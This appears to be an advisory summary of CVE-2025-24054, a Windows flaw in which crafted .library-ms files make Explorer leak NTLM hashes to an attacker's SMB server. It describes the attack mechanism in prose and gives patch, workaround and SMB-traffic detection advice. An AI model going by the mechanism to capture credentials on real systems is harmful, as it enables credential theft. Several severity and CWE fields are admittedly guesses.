Full Report
A Windows vulnerability that exposes NTLM hashes using .library-ms files is now actively exploited by hackers in phishing campaigns targeting government entities and private companies. [...]
Analysis Summary
# Vulnerability: Windows NTLM Hash Leak via Malicious .library-ms File
## CVE Details
- CVE ID: CVE-2025-24054
- CVSS Score: Medium (Severity based on description, exact score not provided)
- CWE: (Not explicitly mentioned, related to Improper Input Validation or Authentication Bypass)
## Affected Systems
- Products: Windows (Specific OS versions not fully detailed, vulnerability related to Windows Explorer interaction with .library-ms files)
- Versions: Undisclosed vulnerable versions of Windows.
- Configurations: Any configuration where NTLM authentication is active and exploitation of the path within a `.library-ms` file is possible.
## Vulnerability Description
This vulnerability resides in how Windows Explorer handles the `.library-ms` file type. A malicious `.library-ms` file can be crafted to contain a path pointing to a remote Server Message Block (SMB) server controlled by an attacker. Minimal user interaction with this file, such as **single-clicking, right-clicking, or inspecting** it in Explorer, triggers Windows to attempt an SMB connection to the remote server. This connection forces the system to authenticate via NTLM, dumping the user's NTLM password hash to the attacker's listening server. Exploitation does not always require the file to be extracted from a ZIP archive in later observed campaigns; merely downloading the file was sufficient.
## Exploitation
- Status: Exploited in the wild (Campaigns targeting global companies reported by Check Point)
- Complexity: Low (Requires minimal user interaction, like viewing or inspecting the file)
- Attack Vector: Network (Relies on user interaction upon file presentation/discovery)
## Impact
- Confidentiality: High (Allows for capture of NTLM hashes, leading to potential credential theft)
- Integrity: Medium (Potential for authentication bypass and privilege escalation)
- Availability: Low (Direct impact on system availability is not the primary goal)
## Remediation
### Patches
- Microsoft released **March 2025 updates** addressing this flaw. Organizations should ensure these updates are installed.
### Workarounds
- Disable NTLM authentication if it is not strictly required in the environment.
## Detection
- **Indicators of Compromise (IoC):** Network traffic indicating unexpected SMB client connections originating from endpoints immediately following interaction with untrusted files.
- **Detection Methods and Tools:** Monitoring SMB/NetBIOS traffic (ports 139, 445) for connections to unknown external IP addresses originating from user workstations, especially following file handling events. Security tools analyzing file metadata or email attachments for suspicious `.library-ms` files.
## References
- Check Point Research Advisory (Specific year/date reference provided in text): research[.]checkpoint[.]com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
- Microsoft Advisories (March 2025 security updates)